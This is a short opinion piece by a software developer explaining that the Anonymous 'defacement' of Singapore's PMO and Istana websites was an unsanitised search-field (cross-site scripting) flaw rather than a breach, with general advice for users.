By Chong Kai Xiong
Reports so far give the impression that the websites of PMO and Istana had been defaced, but this is wrong and misleading.
The websites themselves had not been breached or modified in any way. The hack merely consisted of a specially crafted URL, which when viewed, displays a search results page with the Anon marquee and banner overlaid on top.
The flaw with the websites lies with the search function failing to sanitise search terms. When a search is run with terms that contain code, the webpage duly echoes back the code and is modified as a result. Without the specially crafted search terms (or the special URLs), nothing extraordinary happens.
Still, this is an elementary flaw and it beggars belief it had eluded the website developers. Depending on the robustness of the internal site implementation, the flaw could have been exploited for darker purposes. At the simplest, it could be used to modify information on the website with the intention to mislead; in the worst case, it could be used to leak sensitive website data or to inject malicious code that compromises the computers of site visitors. Little wonder then that the government chose to abruptly disable searching.
Anon’s exploit is rather benign, done mostly for a laugh at government incompetence. It’s like publicly shouting and pointing everyone to a person’s open zipper.
Anon exposed a flaw that should have been closed. One might even say that the government ought to thank Anon for highlighting it. Think of the terrible possibilities criminal hackers could do if they found the hole first and kept it a secret.
There’s also a lesson for users. Keep your browsers up-to-date and don’t blindly click through links, especially to compromised websites.
Chong Kai Xiong is currently a freelance software developer working in Singapore, who has been providing IT support and consultation for numerous civil groups.